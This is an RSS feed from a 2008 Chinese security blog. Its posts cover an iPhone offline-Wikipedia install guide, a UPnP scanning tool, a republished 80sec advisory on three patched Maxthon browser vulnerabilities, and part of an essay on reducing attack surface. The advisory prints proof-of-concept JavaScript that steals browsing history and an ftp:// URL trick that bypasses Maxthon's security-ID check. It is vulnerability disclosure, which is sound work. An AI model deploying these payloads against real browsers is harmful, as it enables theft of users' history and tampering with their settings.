<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.feedsky.com/styles/feedsky8.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0"><channel><atom:link href="http://feed.huaidan.org" type="application/rss+xml" ref="self"></atom:link><fs:self_link href="http://feed.feedsky.com/sunlei" type="application/rss+xml"></fs:self_link><lastBuildDate>Wed, 02 Jul 2008 12:49:55 GMT</lastBuildDate><title>鬼仔's Blog</title><description>Fuck The World!</description><image><url>http://www.feedsky.com/feed/sunlei/sc/gif</url><title>鬼仔's Blog</title><link>http://huaidan.org</link></image><link>http://huaidan.org</link><atom:link href="http://huaidan.org/index.php?feed=rss2" rel="self" type="application/rss+xml"></atom:link><language>en</language><pubDate>Wed, 02 Jul 2008 12:49:55 GMT</pubDate><dc:date>2008-07-02T12:49:55Z</dc:date><dc:language>en</dc:language><item><title>iPhone上的离线维基百科（附安装方法）</title><link>http://huaidan.org/archives/2121.html</link><content:encoded>&lt;p&gt;原帖见&lt;a href=&quot;http://www.weiphone.com/viewthread.php?tid=65919&quot;&gt;此&lt;/a&gt;。&lt;/p&gt;
&lt;p&gt;Wiki2Touch：&lt;a href=&quot;http://code.google.com/p/wiki2touch/&quot;&gt;http://code.google.com/p/wiki2touch/&lt;/a&gt;&lt;br /&gt;
Wiki2Touch的界面截图：&lt;a href=&quot;http://www.haukap.com/wiki2touch/&quot;&gt;http://www.haukap.com/wiki2touch/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;但是原帖写的很乱，我刚开始都没看懂什么意思。整理了下，说下&lt;a href=&quot;http://huaidan.org/&quot;&gt;我&lt;/a&gt;的安装方法（文章中的软件，工具及数据都是发日志时最新的，请自行查找更新的版本，&lt;a href=&quot;http://huaidan.org/&quot;&gt;我&lt;/a&gt;是在windows下做的）：&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1、&lt;/strong&gt;到维基网页下载想安装的维基数据包 &lt;a href=&quot;http://download.wikimedia.org/backup-index.html&quot; target=&quot;_blank&quot;&gt;http://download.wikimedia.org/backup-index.html&lt;/a&gt;&lt;br /&gt;
中文维基是zhwiki，我下载的是08年6月25日的数据，也是目前最新的：&lt;br /&gt;
下载页面：&lt;a href=&quot;http://download.wikimedia.org/zhwiki/20080625/&quot; target=&quot;_blank&quot;&gt;http://download.wikimedia.org/zhwiki/20080625/&lt;/a&gt;&lt;br /&gt;
一般只需要pages-articles.xml.bz2就够了，直接下载地址：&lt;a href=&quot;http://download.wikimedia.org/zhwiki/20080625/zhwiki-20080625-pages-articles.xml.bz2&quot;&gt;zhwiki-20080625-pages-articles.xml.bz2&lt;/a&gt;&lt;br /&gt;
&lt;span id=&quot;more-2121&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;2、&lt;/strong&gt;下载&lt;a href=&quot;http://code.google.com/p/wiki2touch/downloads/list&quot;&gt;Wiki2TouchUtils_Win_065.zip&lt;/a&gt;，解压缩。（到&lt;a href=&quot;http://code.google.com/p/wiki2touch/downloads/list&quot;&gt;此&lt;/a&gt;查找新版本）&lt;br /&gt;
将下载得到的zhwiki-20080625-pages-articles.xml.bz2跟上面解压得到的indexer.exe放于同一目录下，到命令行下切换到indexer.exe所在目录&lt;br /&gt;
然后运行“indexer -d 档案名”&lt;br /&gt;
这里我运行的是“indexer -d zhwiki-20080625-pages-articles.xml.bz2”&lt;br /&gt;
待运行完毕之后得到articles.bin和images.txt两个文件。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3、&lt;/strong&gt;在Installer中加入源http://168weedon.com/i，到Temporary中找到Wiki2Touch，安装。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4、&lt;/strong&gt;通过iPhone PC Suite或者ssh，把articles.bin和images.txt上传到iPhone上的&lt;br /&gt;
/private/var/mobile/Media/Wikipedia/zh （1.1.4）下&lt;br /&gt;
/private/var/root/Media/Wikipedia/zh （1.1.3以下）下&lt;/p&gt;
&lt;p&gt;在1.1.3／1.1.4下请以ssh /terminal 以root 身份输入以下指令，可大幅加速页面显示速度：&lt;br /&gt;
chown -R mobile:mobile /var/mobile/Media/Wikipedia&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5、&lt;/strong&gt;iphone中打开Wiki2Touch&lt;br /&gt;
填好Port (默认就行)&lt;br /&gt;
Expend template 就是把页面上的模版都解开显示出来, On 的话页面会比较漂亮但较慢, 而且有些资料不把这项打开是显示不出来的.每次重开机也需要Enable 一遍.&lt;br /&gt;
然后Launch Browser 即可直接进入维基介面.&lt;/p&gt;
&lt;p&gt;在介面里可直接使用中文进行查询, 找到想看的条目后点击即可.&lt;br /&gt;
另,如果安装了多语言维基, 在寻找时只要加入&quot;语言:&quot;即可找到想要的条目, 如&quot;zh:孔子&quot; &quot;en:iPhone&quot;等&lt;/p&gt;
&lt;p&gt;按上面的安装方法安装后, 所有条目都没有图像, 这是因为维基上图像实在太多, 而且没有一个有系统的方法下载全部图像, 所以一般离线维基都不会附图&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;图像的安装方法:&lt;/strong&gt;&lt;br /&gt;
地址：&lt;a href=&quot;http://8iz.biz/iphone/wiki060/zhwiki/images.rar&quot;&gt;http://8iz.biz/iphone/wiki060/zhwiki/images.rar&lt;/a&gt;（不清楚这个是哪天做的）&lt;/p&gt;
&lt;p&gt;解压缩后把images.bin 传到iPhone 和articles.bin 放一起就可以&lt;br /&gt;
大约有90%的图像都能显示&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;自制图像包：&lt;/strong&gt;&lt;br /&gt;
Windows 机器一台, 2GB硬盘空间, 十小时不间断挂网&lt;br /&gt;
iPhone, 至少有800MB 空间&lt;br /&gt;
&lt;a href=&quot;http://wiki2touch.googlecode.com/files/Wiki2TouchUtils_Win_065.zip&quot;&gt;Wiki2TouchUtils_Win_065.zip&lt;/a&gt;&lt;br /&gt;
上面生成的image.txt&lt;br /&gt;
&lt;a href=&quot;http://wiki2touch.googlecode.com/files/ImageGetter_1_01.zip&quot;&gt;ImageGetter_1_01.zip&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;把ImageGetter_1_0.zip 解开, 在bin/Release内有ImageGetter.exe&lt;br /&gt;
把它和image.txt 放到一起&lt;br /&gt;
双点ImageGetter.exe, 在Language code 填zh 按Go&lt;br /&gt;
挂网等候十小时, 会生成约800MB 大的Images 档案夹&lt;br /&gt;
生成后, 从Wiki2TouchUtils_Win_060.zip拿到pack.exe , 把它也和ImageGetter.exe 放到一起&lt;br /&gt;
使用Command prompt 输入: pack zh Images&lt;br /&gt;
这一步会生成一个images.bin (约600MB)&lt;br /&gt;
最后把images.bin 传到iPhone 和articles.bin 放一起就可以&lt;/p&gt;
&lt;p&gt;============================================== &lt;a href=&quot;http://www.haukap.com/wiki2touch/&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://www.haukap.com/wiki2touch/images/03_main.png&quot; alt=&quot;&quot; /&gt; &lt;img src=&quot;http://pic.yupoo.com/sunlei/343655ceec28/o376l5gg.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2121.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/tools&quot; title=&quot;显示工具收集的所有日志&quot; rel=&quot;category tag&quot;&gt;工具收集&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2121.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2121.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2121.html&amp;amp;title=iPhone上的离线维基百科（附安装方法）&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2121.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2121.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2121.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/697.html&quot; title=&quot;十万分的感谢! 中文维基百科条目今日过100,000 (2006/11/12)&quot;&gt;十万分的感谢! 中文维基百科条目今日过100,000&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/689.html&quot; title=&quot;中文维基百科访问恢复 (2006/11/10)&quot;&gt;中文维基百科访问恢复&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1936.html&quot; title=&quot;iPhone 到手 (2008/04/28)&quot;&gt;iPhone 到手&lt;/a&gt; (18)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1420.html&quot; title=&quot;iPhone 1.1.1/iPod Touch文件系统破解源代码 (2007/10/23)&quot;&gt;iPhone 1.1.1/iPod Touch文件系统破解源代码&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/848.html&quot; title=&quot;iPhone (2007/01/10)&quot;&gt;iPhone&lt;/a&gt; (2)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/dccf48d4f2891b7168e8da976c410cad&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/dccf48d4f2891b7168e8da976c410cad/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2121.html/feed</wfw:commentRss><description>原帖见此。
Wiki2Touch：http://code.google.com/p/wiki2touch/
Wiki2Touch的界面截图：http://www.haukap.com/wiki2touch/
但是原帖写的很乱，我刚开始都没看懂什么意思。整理了下，说下我的安装方法（文章中的软件...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/dccf48d4f2891b7168e8da976c410cad&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/dccf48d4f2891b7168e8da976c410cad/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>工具收集</category><category>iPhone</category><category>维基百科</category><pubDate>Wed, 02 Jul 2008 20:49:55 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2121.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2121</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2121.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/89513302/1230972</fs:itemid></item><item><title>UpnpFuzz</title><link>http://huaidan.org/archives/2120.html</link><content:encoded>&lt;p&gt;作者：cnqing&lt;/p&gt;
&lt;p&gt;这个东西是去年当哥提出来的，据说一些后门木马也用Upnp做NAT了。 当然UpnpFuzz不仅仅是开Nat，当我不知道路由密码，而路由开启了Upnp的时候，用它就很容易的把自己映射到外网了。撇开功能不谈，Upnp 还是比较具有前瞻性的。&lt;br /&gt;
UpnpFuzz是一个通用的无驱Upnp客户端         可发现任意的Upnp设备         扫描所有的方法和参数         生成所有的执行方法     使用方法      选择扫描类型，点扫描，就会列出网络中存在的Upnp设备了。&lt;br /&gt;
&lt;span id=&quot;more-2120&quot;&gt;&lt;/span&gt;&lt;br /&gt;
Upnp协议的详细细节可参考  http://baike.baidu.com/view/277224.htm&lt;/p&gt;
&lt;p&gt;截图：&lt;br /&gt;
&lt;img src=&quot;http://pic.yupoo.com/sunlei/630905cec6e7/jb5jsy7r.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;下载地址：&lt;/strong&gt; &lt;a href=&quot;http://www.cncert.net/up_files/soft/upnpfuzz.rar&quot;&gt;http://www.cncert.net/up_files/soft/upnpfuzz.rar&lt;/a&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2120.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/tools&quot; title=&quot;显示工具收集的所有日志&quot; rel=&quot;category tag&quot;&gt;工具收集&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2120.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2120.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2120.html&amp;amp;title=UpnpFuzz&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2120.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2120.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2120.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;无相关日志&lt;/li&gt;
	&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/b223c5b37bde17bf258cf7f9ae5d4ebe&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/b223c5b37bde17bf258cf7f9ae5d4ebe/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2120.html/feed</wfw:commentRss><description>作者：cnqing
这个东西是去年当哥提出来的，据说一些后门木马也用Upnp做NAT了。 当然UpnpFuzz不仅仅是开Nat，当我不知道路由密码，而路由开启了Upnp的时候，用它就很容易的把自己映射到外网了...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/b223c5b37bde17bf258cf7f9ae5d4ebe&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/b223c5b37bde17bf258cf7f9ae5d4ebe/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>工具收集</category><category>Upnp</category><pubDate>Wed, 02 Jul 2008 18:01:50 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2120.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2120</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2120.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/89501006/1230972</fs:itemid></item><item><title>遨游修复的几个安全漏洞</title><link>http://huaidan.org/archives/2118.html</link><content:encoded>&lt;p&gt;来源：80sec&lt;/p&gt;
&lt;p&gt;在80sec通知遨游存在的安全漏洞之后，遨游于6.30号发布了新版的浏览器，修复了前面提到的安全漏洞，具体更新可以见http://blog.maxthon.cn/，此次更新修复了三个安全问题，主要的问题细节如下：&lt;/p&gt;
&lt;p&gt;漏洞来源：http://www.80sec.com/release/maxthon-vulns-poc.txt&lt;/p&gt;
&lt;p&gt;1	浏览器内核漏洞导致的本地跨域漏洞&lt;br /&gt;
&lt;span id=&quot;more-2118&quot;&gt;&lt;/span&gt;&lt;br /&gt;
漏洞说明：maxthon采用了系统的IE内核，但是该内核可能存在一些安全漏洞导致跨域攻击，而遨游的max:等的域是在本地等同于file://，所以这个跨域攻击将导致在本地上下文中执行javascript代码，这里只给出取得遨游浏览历史记录的POC。&lt;/p&gt;
&lt;p&gt;漏洞POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&amp;lt;a href=&quot;&quot;&amp;gt;Maxthon Exploit&amp;lt;/a&amp;gt;
&amp;lt;script&amp;gt;
function win(){
x=window.open(&quot;max:history&quot;);
setTimeout(function(){
x.location=new String(&quot;javascript:x=maxHistory.history.list.site.loadData();for(i=0;i&amp;lt;x.length;i++) document.write(x[i].site+\”&amp;lt;br&amp;gt;\”);”)
},3000)
}
window.onload=function(){
for (i=0;i&amp;lt;document.links.length;i++) {
document.links[i].href=”javascript:win()”
}
}
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;漏洞修复：在IE内核修复之前，遨游新版本已经修复这个安全漏洞&lt;/p&gt;
&lt;p&gt;2	遨游安全中心漏洞导致的远程修改任意用户设置&lt;/p&gt;
&lt;p&gt;漏洞说明：遨游对IE内核的一些特性并不是十分了解，导致在处理一些特殊情况时出现安全漏洞。遨游的控制中心实际上就是一组 HTML+JAVASCRIPT，通过这些页面可以读取敏感数据，修改浏览器设置，下载文件等等。当然，遨游也有自己的安全策略，将那些HTML文件放到 外部站点上并不能直接调用，因为遨游有一个安全控制策略，security.src，这个文件代码如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
var max_security_id=''; var url=String(document.location).toLowerCase(); if(url.indexOf('file://')&amp;gt;-1&amp;amp;&amp;amp;url.indexOf('http://')==-1&amp;amp;&amp;amp;url.indexOf('https://')==-1){ max_security_id='{B73B3AC9-B009-4429-AE67-514332D791FE}'; }else{ document.location='about:blank'; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;其中max_security_id是遨游在调用各种控件时必须的一个参数，这个参数在各个功能里是必须的，各个机器的max_security_id并 不相同。如果我们能取得这个max_security_id那么就可以在远程任意站点调用遨游的各种功能譬如设置，读取敏感数据甚至是远程代码执行了。&lt;/p&gt;
&lt;p&gt;首先，这个max_security_id每次启动貌似都会更改，这个max_security_id会存储在安装目录的template/security.src里，而我们可以在自己的站点页面里做如下调用：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&amp;lt;script src=&quot;E:\Program Files\Maxthon2\template\security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;d:\Program Files\Maxthon2\template\security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;c:\Program Files\Maxthon2\template\security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;别意外，遨游是允许做这样调用本地文件的：），但是security.src也是有限制的，只有当location里包含file:///并且不包 含http://和https:///的时候才会赋值，否则会跳转。这里遨游有个错误就是黑名单策略导致可以使用譬如ftp://的协议饶过，至于想包含 file://也很简单：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
ftp://www.foo.com/exploit.html#file://80sec.com
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;这样一个地址实际访问的是exploit.html，但是location却包含file://，安全策略被饶过，可以取得max_security_id，然后利用取得的max_security_id可以做一切操作。&lt;/p&gt;
&lt;p&gt;漏洞POC：&lt;/p&gt;
&lt;p&gt;搭建一个匿名ftp服务器www.foo.com，然后在恶意站点做如下引用：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&amp;lt;iframe src=&quot;ftp://www.foo.com/history/index.htm#file:///www.80sec.com&quot; width=100% height=100%&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;/history/index.htm为放在www.foo.com上的精心构造的exploit，最简单的方式就是将官方安装目录里的template里的history等子目录下面的index.html里的&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&amp;lt;script type=&quot;text/javascript&quot; src=&quot;../security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;换成&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
&amp;lt;script src=&quot;E:\Program Files\Maxthon2\template\security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;d:\Program Files\Maxthon2\template\security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;c:\Program Files\Maxthon2\template\security.src&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;通过修改里面的index.htm内容就可以修改浏览器设置，读取历史记录等等&lt;/p&gt;
&lt;p&gt;漏洞修复：新版本将代码修正为&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
var max_security_id=''; if(String(window.document.location).toLowerCase().indexOf('file://')==0){ max_security_id='{02E14D94-53C8-4B6D-89AE-755DC5299C6C}'; }else{ document.location='about:blank'; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;限定只能本地文件能引用这个js，修复了这个问题。&lt;/p&gt;
&lt;p&gt;3	RSS订阅跨站脚本漏洞&lt;/p&gt;
&lt;p&gt;漏洞说明：遨游在实现rss功能时存在问题，导致在访问有问题的页面时会出现xss漏洞&lt;/p&gt;
&lt;p&gt;漏洞POC：订阅http://www.80sec.com/feed就可以看到效果：）&lt;/p&gt;
&lt;p&gt;漏洞修复：新版本已经修复&lt;/p&gt;
&lt;p&gt;Maxthon对待漏洞的态度非常严谨,希望Maxthon用户尽快升级到新版.&lt;/p&gt;
&lt;p&gt;本站内容均为原创，转载请务必保留署名与链接！&lt;br /&gt;
遨游修复的几个安全漏洞:&lt;a title=&quot;遨游修复的几个安全漏洞&quot; href=&quot;http://www.80sec.com/maxthon-vulns-poc.html&quot;&gt;http://www.80sec.com/maxthon-vulns-poc.html&lt;/a&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2118.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/technology&quot; title=&quot;显示技术文章的所有日志&quot; rel=&quot;category tag&quot;&gt;技术文章&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2118.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2118.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2118.html&amp;amp;title=遨游修复的几个安全漏洞&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2118.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2118.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2118.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;无相关日志&lt;/li&gt;
	&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/e407d703cdafaacf581aa3ef457c8c9d&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/e407d703cdafaacf581aa3ef457c8c9d/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2118.html/feed</wfw:commentRss><description>来源：80sec
在80sec通知遨游存在的安全漏洞之后，遨游于6.30号发布了新版的浏览器，修复了前面提到的安全漏洞，具体更新可以见http://blog.maxthon.cn/，此次更新修复了三个安全问题，主要的问题...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/e407d703cdafaacf581aa3ef457c8c9d&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/e407d703cdafaacf581aa3ef457c8c9d/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>技术文章</category><category>遨游</category><pubDate>Tue, 01 Jul 2008 14:31:25 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2118.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2118</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2118.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/89152791/1230972</fs:itemid></item><item><title>关于minimize attack surface</title><link>http://huaidan.org/archives/2117.html</link><content:encoded>&lt;p&gt;BY:刺&lt;/p&gt;
&lt;p&gt;最近看到又有老外讲到这一点，先扯扯我的体会。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;minimize attack surface&lt;/strong&gt;就是要尽量减少可能被攻击的点。&lt;/p&gt;
&lt;p&gt;从战略上来讲，就是&lt;strong&gt;解决或者隐藏&lt;/strong&gt;自己的弱点。&lt;/p&gt;
&lt;p&gt;要做到这点，首先需要的就是一个好的&lt;strong&gt;架构&lt;/strong&gt;。&lt;/p&gt;
&lt;p&gt;好的架构，可以节省很多事情，从服务器部署方式，网络拓跋结构，使用什么语言，使用什么平台框架，使用什么DB，ACL如何做，如果统一发布、升级、回滚、监控。&lt;br /&gt;
&lt;span id=&quot;more-2117&quot;&gt;&lt;/span&gt;&lt;br /&gt;
在设计一个系统之初，如果能够考虑到这些因素，对minimize attack surface是非常有帮助的，能够起到最佳的效果。&lt;/p&gt;
&lt;p&gt;简单来说，比如流程上的逻辑漏洞（就是类似那种step1直接跳到step3的），可能就涉及到了页面控制、webflow等，如果采用spring框架，用配置文件来管理页面流程，就有了一个可控的途径。&lt;/p&gt;
&lt;p&gt;虽然框架是死的，不能说用了spring就能完全杜绝这种漏洞；但人是活的，如果有良好的制度保证每个流程都是规范的，都有人review，那么就能把这种漏洞杜绝掉。&lt;/p&gt;
&lt;p&gt;再比如说注射，如果数据持久层设计的好，那么注射的风险是可以在人的控制下杜绝掉的。比如使用ibatis，使用sqlmap等，有人来review是否有做变量绑定。&lt;/p&gt;
&lt;p&gt;好的架构是缩小攻击面的第一步，那么有的系统已经设计好了，你很难去改变架构，这时候该怎么办呢？&lt;/p&gt;
&lt;p&gt;失去最有效率的方法后，只能从别的方面补救。&lt;/p&gt;
&lt;p&gt;我们需要尽可能利用科学的方法，做到没有遗漏攻击途径。&lt;/p&gt;
&lt;p&gt;首先，要明确需要保护的是什么，什么才是&lt;strong&gt;最重要&lt;/strong&gt;的东西。&lt;/p&gt;
&lt;p&gt;这个最重要的东西不一定是BOSS说的，因为很多时候BOSS对于安全的嗅觉不够敏感，这时候就需要安全人员去引导，去访谈。&lt;/p&gt;
&lt;p&gt;确定好要保护好的东西后，再分析&lt;strong&gt;数据流图&lt;/strong&gt;。&lt;/p&gt;
